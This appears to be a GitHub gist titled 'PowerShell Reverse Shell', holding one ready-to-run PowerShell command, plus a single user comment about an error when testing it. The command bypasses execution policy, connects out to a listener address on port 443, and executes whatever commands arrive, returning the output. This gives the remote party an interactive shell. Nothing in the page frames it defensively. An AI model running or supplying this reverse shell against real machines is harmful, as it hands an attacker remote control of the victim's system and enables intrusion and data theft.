Skip to content

Instantly share code, notes, and snippets.

@ohpe
Last active Aug 25, 2021
Embed
What would you like to do?
PowerShell Reverse Shell
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
@noamo48

This comment has been minimized.

Copy link

@noamo48 noamo48 commented Nov 1, 2019

Getting the error "Program 'powershell.exe' failed to run: The filename or extension is too long" when testing this locally

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment